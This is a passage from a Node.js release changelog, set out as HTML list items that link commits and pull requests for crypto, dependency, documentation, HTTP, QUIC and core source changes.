<li>[<a href="https://github.com/nodejs/node/commit/56e2505e48"><code>56e2505e48</code></a>] - <strong>crypto</strong>: wire ML-DSA and ML-KEM for use when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3bac77f2a8"><code>3bac77f2a8</code></a>] - <strong>crypto</strong>: wire ChaCha20-Poly1305 in Web Cryptography when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1bff901b09"><code>1bff901b09</code></a>] - <strong>crypto</strong>: wire AES-KW in Web Cryptography when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4433fca3df"><code>4433fca3df</code></a>] - <strong>crypto</strong>: harden CryptoKey algorithm slots (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63111" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63111/hovercard">#63111</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b5cf01217a"><code>b5cf01217a</code></a>] - <strong>crypto</strong>: harden KeyObject internal slots (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63111" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63111/hovercard">#63111</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ce84aef37d"><code>ce84aef37d</code></a>] - <strong>crypto</strong>: add guards and adjust tests for BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62883" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62883/hovercard">#62883</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/26781689b0"><code>26781689b0</code></a>] - <strong>crypto</strong>: reject duplicate ML-KEM JWK key_ops (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62905" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62905/hovercard">#62905</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/aeea8f4970"><code>aeea8f4970</code></a>] - <strong>crypto</strong>: add JWK support for ML-KEM and SLH-DSA key types (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62706" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62706/hovercard">#62706</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/407cf91656"><code>407cf91656</code></a>] - <strong>crypto</strong>: guard against size_t overflow on experimental 32-bit arch (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62626" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62626/hovercard">#62626</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bb2857b85a"><code>bb2857b85a</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: align key argument names in docs and error messages (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b9d5e87880"><code>b9d5e87880</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: accept key data in crypto.diffieHellman() and cleanup DH jobs (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b46d52b283"><code>b46d52b283</code></a>] - <strong>crypto</strong>: unify asymmetric key import through KeyObjectHandle::Init (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62499" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62499/hovercard">#62499</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ccd756d61e"><code>ccd756d61e</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: add TurboSHAKE and KangarooTwelve Web Cryptography algorithms (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62183" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62183/hovercard">#62183</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e07e7a31e1"><code>e07e7a31e1</code></a>] - <strong>crypto</strong>: update root certificates to NSS 3.123.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63527/hovercard">#63527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/61826df455"><code>61826df455</code></a>] - <strong>crypto</strong>: coerce -0 keylen to +0 in pbkdf2 and scrypt (Jordan Harband) <a href="https://github.com/nodejs/node/pull/63531" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63531/hovercard">#63531</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/16d2fd3c07"><code>16d2fd3c07</code></a>] - <strong>crypto</strong>: align verifyOneShot accepted types (Anshika Jain) <a href="https://github.com/nodejs/node/pull/63280" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63280/hovercard">#63280</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3b8330deda"><code>3b8330deda</code></a>] - <strong>crypto</strong>: improve system certificate enumeration logic on macOS (Robo) <a href="https://github.com/nodejs/node/pull/62576" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62576/hovercard">#62576</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/141de35399"><code>141de35399</code></a>] - <strong>debugger</strong>: add --help to <code>node inspect</code> and improve docs (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63201" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63201/hovercard">#63201</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b76bfcd4fa"><code>b76bfcd4fa</code></a>] - <strong>deps</strong>: upgrade npm to 11.16.0 (npm team) <a href="https://github.com/nodejs/node/pull/63602" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63602/hovercard">#63602</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4ec142314c"><code>4ec142314c</code></a>] - <strong>deps</strong>: SQLite: cherry-pick b869ed6b067d623cb1383549f2a18aa35508385d (Junsu Han) <a href="https://github.com/nodejs/node/pull/63525" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63525/hovercard">#63525</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/19e8ce1c36"><code>19e8ce1c36</code></a>] - <strong>deps</strong>: upgrade npm to 11.15.0 (npm team) <a href="https://github.com/nodejs/node/pull/63463" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63463/hovercard">#63463</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8a264260e2"><code>8a264260e2</code></a>] - <strong>deps</strong>: update sqlite to 3.53.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63217" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63217/hovercard">#63217</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/50c8ff3f94"><code>50c8ff3f94</code></a>] - <strong>deps</strong>: update simdjson to 4.6.4 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/62811" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62811/hovercard">#62811</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6e56f01c4b"><code>6e56f01c4b</code></a>] - <strong>deps</strong>: V8: cherry-pick 435a2cdf664c (Matthias Liedtke) <a href="https://github.com/nodejs/node/pull/63136" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63136/hovercard">#63136</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3ba813b242"><code>3ba813b242</code></a>] - <strong>deps</strong>: cherry-pick <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/libuv/libuv/commit/a43e543/hovercard" href="https://github.com/libuv/libuv/commit/a43e543">libuv/libuv@<tt>a43e543</tt></a> (Ali Hassan) <a href="https://github.com/nodejs/node/pull/63222" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63222/hovercard">#63222</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2390e3a5ac"><code>2390e3a5ac</code></a>] - <strong>doc</strong>: remove duplicated sentences in large-pull-requests.md (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63650" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63650/hovercard">#63650</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/52a1c18374"><code>52a1c18374</code></a>] - <strong>doc</strong>: update <code>git node land</code> instructions for security releases (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63586" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63586/hovercard">#63586</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3e6b4da037"><code>3e6b4da037</code></a>] - <strong>doc</strong>: drop --experimental from --permission (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/63583" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63583/hovercard">#63583</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/84d05163b9"><code>84d05163b9</code></a>] - <strong>doc</strong>: explicitly ask for reproducible in JS (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/63479" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63479/hovercard">#63479</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7da2a4450e"><code>7da2a4450e</code></a>] - <strong>doc</strong>: fix URL postMessage example in worker_threads (Kit Dallege) <a href="https://github.com/nodejs/node/pull/62203" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62203/hovercard">#62203</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3d79bd8b29"><code>3d79bd8b29</code></a>] - <strong>doc</strong>: clarify <code>filter</code> option of <code>sqlite.database.applyChangeset</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63515" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63515/hovercard">#63515</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4f4174aace"><code>4f4174aace</code></a>] - <strong>doc</strong>: fix double spaces in ERR_TLS_INVALID_PROTOCOL_METHOD (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63511" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63511/hovercard">#63511</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/388323ca4b"><code>388323ca4b</code></a>] - <strong>doc</strong>: fix double space in modules.md (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63512" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63512/hovercard">#63512</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5258ccc058"><code>5258ccc058</code></a>] - <strong>doc</strong>: fix "options" to "option" in tls.createServer (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63453" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63453/hovercard">#63453</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/43e83e6507"><code>43e83e6507</code></a>] - <strong>doc</strong>: fix typo in deprecations (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63434" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63434/hovercard">#63434</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f05a61d54c"><code>f05a61d54c</code></a>] - <strong>doc</strong>: remove unsupported template type from v8.md (René) <a href="https://github.com/nodejs/node/pull/63410" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63410/hovercard">#63410</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c39d5fc820"><code>c39d5fc820</code></a>] - <strong>doc</strong>: fix article usage before vowel-sound acronyms (joao-oliveira-softtor) <a href="https://github.com/nodejs/node/pull/62696" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62696/hovercard">#62696</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/398261f911"><code>398261f911</code></a>] - <strong>doc</strong>: remove the bi-monthly contributor spotlight section (Claudio Wunder) <a href="https://github.com/nodejs/node/pull/62734" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62734/hovercard">#62734</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fd9e14c405"><code>fd9e14c405</code></a>] - <strong>doc</strong>: update http2's <code>push</code> and <code>trailers</code> events with <code>rawHeaders</code> param (YuSheng Chen) <a href="https://github.com/nodejs/node/pull/63259" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63259/hovercard">#63259</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b943ce6933"><code>b943ce6933</code></a>] - <strong>doc</strong>: remove inactive members from Triagers list (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63329" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63329/hovercard">#63329</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4b9cdfc022"><code>4b9cdfc022</code></a>] - <strong>doc</strong>: reference correct function in Module docs (Robin Malfait) <a href="https://github.com/nodejs/node/pull/63247" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63247/hovercard">#63247</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bed84b6df2"><code>bed84b6df2</code></a>] - <strong>doc</strong>: replace Visual Studio 2022 Evergreen version reference with 17.14 (Mike McCready) <a href="https://github.com/nodejs/node/pull/63211" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63211/hovercard">#63211</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/32ea70569b"><code>32ea70569b</code></a>] - <strong>doc</strong>: recommend explicitly Tier 1 or 2 for production applications (Mike McCready) <a href="https://github.com/nodejs/node/pull/63187" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63187/hovercard">#63187</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4627bcfd82"><code>4627bcfd82</code></a>] - <strong>doc</strong>: run license-builder (github-actions[bot]) <a href="https://github.com/nodejs/node/pull/63232" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63232/hovercard">#63232</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/28eba71845"><code>28eba71845</code></a>] - <strong>doc</strong>: add large pull requests contributing guide (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62829" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62829/hovercard">#62829</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2648efd438"><code>2648efd438</code></a>] - <strong>doc</strong>: remove unnecessary <code>&lt;!-- eslint-</code> magic comments (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63200" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63200/hovercard">#63200</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a95fc1f8fc"><code>a95fc1f8fc</code></a>] - <strong>doc</strong>: clarify SEA platform support excludes darwin-x64 (MJSHANG) <a href="https://github.com/nodejs/node/pull/63181" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63181/hovercard">#63181</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/aaef29e2e1"><code>aaef29e2e1</code></a>] - <strong>doc</strong>: update release steps when post-release fails (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/63131" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63131/hovercard">#63131</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7d81419cf2"><code>7d81419cf2</code></a>] - <strong>doc</strong>: add Hmac.digest() documentation-only deprecation (DEP0206) (Anshika Jain) <a href="https://github.com/nodejs/node/pull/63121" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63121/hovercard">#63121</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ececd80d81"><code>ececd80d81</code></a>] - <strong>doc</strong>: document the latest-vX.x schema (Marco Ippolito) <a href="https://github.com/nodejs/node/pull/63033" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63033/hovercard">#63033</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/27c1c1d842"><code>27c1c1d842</code></a>] - <strong>doc</strong>: remove list of versions in <code>BUILDING.md</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63113" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63113/hovercard">#63113</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e369886a65"><code>e369886a65</code></a>] - <strong>doc,sqlite</strong>: document entryPoint argument for loadExtension (Edy Silva) <a href="https://github.com/nodejs/node/pull/63152" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63152/hovercard">#63152</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e4e5137cbd"><code>e4e5137cbd</code></a>] - <strong>errors</strong>: handle V8 warnings in DisallowJavascriptExecutionScope (Divyanshu Sharma) <a href="https://github.com/nodejs/node/pull/63491" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63491/hovercard">#63491</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6d1f6048d2"><code>6d1f6048d2</code></a>] - <strong>fs</strong>: make <code>Date</code> properties on <code>Stats</code> enumerable (LiviaMedeiros) <a href="https://github.com/nodejs/node/pull/63328" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63328/hovercard">#63328</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/44c8ebcbd6"><code>44c8ebcbd6</code></a>] - <strong>http</strong>: avoid stream listeners on idle agent sockets (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64004" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64004/hovercard">#64004</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4c9251fc09"><code>4c9251fc09</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>http</strong>: add writeInformation to send arbitrary 1xx status codes (Tim Perry) <a href="https://github.com/nodejs/node/pull/63155" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63155/hovercard">#63155</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/39f61fb06c"><code>39f61fb06c</code></a>] - <strong>http2</strong>: emit session close before stream close (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63414" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63414/hovercard">#63414</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8a8f2127d1"><code>8a8f2127d1</code></a>] - <strong>http2</strong>: validate non-link headers in writeEarlyHints (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62017" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62017/hovercard">#62017</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8c989ec4a3"><code>8c989ec4a3</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>inspector</strong>: expose precise coverage start to JS runtime (sangwook) <a href="https://github.com/nodejs/node/pull/63079" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63079/hovercard">#63079</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c05f38229b"><code>c05f38229b</code></a>] - <strong>lib</strong>: cleanup stateless diffiehellman key handling (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62645" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62645/hovercard">#62645</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1c16b45d35"><code>1c16b45d35</code></a>] - <strong>lib</strong>: refactor internal webidl converters (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62979" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62979/hovercard">#62979</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/02f35d6dce"><code>02f35d6dce</code></a>] - <strong>lib</strong>: define <code>kEnumerableProperty</code> atomically (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63609" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63609/hovercard">#63609</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/12c51547ba"><code>12c51547ba</code></a>] - <strong>lib</strong>: fix typos in esm loader comments (RonGamzu) <a href="https://github.com/nodejs/node/pull/63465" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63465/hovercard">#63465</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9b03b84262"><code>9b03b84262</code></a>] - <strong>lib</strong>: fix typo idenity =&gt; identity (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63112" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63112/hovercard">#63112</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a84e6b0567"><code>a84e6b0567</code></a>] - <strong>lib</strong>: fixes validator message (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/62823" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62823/hovercard">#62823</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/11734166a8"><code>11734166a8</code></a>] - <strong>lib</strong>: narrow ReadableStreamBYOBRequest.view return type to Uint8Array (RoomWithOutRoof) <a href="https://github.com/nodejs/node/pull/63017" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63017/hovercard">#63017</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7cead61d21"><code>7cead61d21</code></a>] - <strong>meta</strong>: flip mcollina emails in .mailmap (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63621" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63621/hovercard">#63621</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a08cfcfd35"><code>a08cfcfd35</code></a>] - <strong>meta</strong>: label "source maps" PRs (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/63591" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63591/hovercard">#63591</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d56e8d2512"><code>d56e8d2512</code></a>] - <strong>meta</strong>: add <code>vfs</code> subsystem label (René) <a href="https://github.com/nodejs/node/pull/62331" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62331/hovercard">#62331</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6201cfe488"><code>6201cfe488</code></a>] - <strong>meta</strong>: skip scheduled workflows on forks (Jamie Magee) <a href="https://github.com/nodejs/node/pull/63565" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63565/hovercard">#63565</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f095e2bd31"><code>f095e2bd31</code></a>] - <strong>meta</strong>: add additional gitignore entries (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1ea52c444c"><code>1ea52c444c</code></a>] - <strong>meta</strong>: move one or more collaborators to emeritus (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63402" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63402/hovercard">#63402</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b1b2327611"><code>b1b2327611</code></a>] - <strong>meta</strong>: move one or more collaborators to emeritus (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63235" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63235/hovercard">#63235</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7d88e130a9"><code>7d88e130a9</code></a>] - <strong>meta</strong>: ignore AI assistants files (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62612" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62612/hovercard">#62612</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a53b51df38"><code>a53b51df38</code></a>] - <strong>module</strong>: load ESM helpers eagerly in the snapshot (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63550" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63550/hovercard">#63550</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/69df688fff"><code>69df688fff</code></a>] - <strong>module</strong>: fix sync hook short-circuit in require() in imported CJS (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/62920" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62920/hovercard">#62920</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/75d9a4ed47"><code>75d9a4ed47</code></a>] - <strong>node-api</strong>: support SharedArrayBuffer in napi_create_typedarray (Yilong Li) <a href="https://github.com/nodejs/node/pull/62710" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62710/hovercard">#62710</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c20aa4c47b"><code>c20aa4c47b</code></a>] - <strong>quic</strong>: add reusePort option to QuicEndpoint (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/26a30d8a7f"><code>26a30d8a7f</code></a>] - <strong>quic</strong>: implement rate limiting for version nego and immediate close (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0b534b5770"><code>0b534b5770</code></a>] - <strong>quic</strong>: fixup linting issue after other changes (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4b367cbe09"><code>4b367cbe09</code></a>] - <strong>quic</strong>: remove unused binding variable in session.cc (James M Snell) <a href="https://github.com/nodejs/node/pull/63177" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63177/hovercard">#63177</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2574bef5a6"><code>2574bef5a6</code></a>] - <strong>repl</strong>: fix dedup comparing normalized line against raw history (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/62886" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62886/hovercard">#62886</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/30e71c7e49"><code>30e71c7e49</code></a>] - <strong>sqlite</strong>: keep source database alive during backup (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62673" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62673/hovercard">#62673</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/677ca7e76c"><code>677ca7e76c</code></a>] - <strong>src</strong>: simplify OpenSSL feature gates (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c863c75c39"><code>c863c75c39</code></a>] - <strong>src</strong>: add BoringSSL EVP enumeration fallback (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63206" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63206/hovercard">#63206</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f6b2466921"><code>f6b2466921</code></a>] - <strong>src</strong>: decouple KeyObject and CryptoKey and move CryptoKey to src (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62924" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62924/hovercard">#62924</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/92d4f07dd2"><code>92d4f07dd2</code></a>] - <strong>src</strong>: remove license headers for new node_profiling files (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/63066" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63066/hovercard">#63066</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8ac5d771c8"><code>8ac5d771c8</code></a>] - <strong>src</strong>: split profiling helpers from util (Ilyas Shabi) <a href="https://github.com/nodejs/node/pull/63008" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63008/hovercard">#63008</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/85d1639495"><code>85d1639495</code></a>] - <strong>src</strong>: remove TOCTOU race condition when encoding SAB-backed <code>Buffer</code>s (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63517" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63517/hovercard">#63517</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9473c5f05c"><code>9473c5f05c</code></a>] - <strong>src</strong>: skip duplicate UTF-8 validation in TextDecoder fatal path (Mert Can Altin) <a href="https://github.com/nodejs/node/pull/63231" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63231/hovercard">#63231</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f35c91ee68"><code>f35c91ee68</code></a>] - <strong>src</strong>: improve token return value check (James M Snell) <a href="https://github.com/nodejs/node/pull/63483" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63483/hovercard">#63483</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/26f677c1c5"><code>26f677c1c5</code></a>] - <strong>src</strong>: expose <code>node::RegisterContext</code> to make a node managed context (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/62322" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62322/hovercard">#62322</a></li>
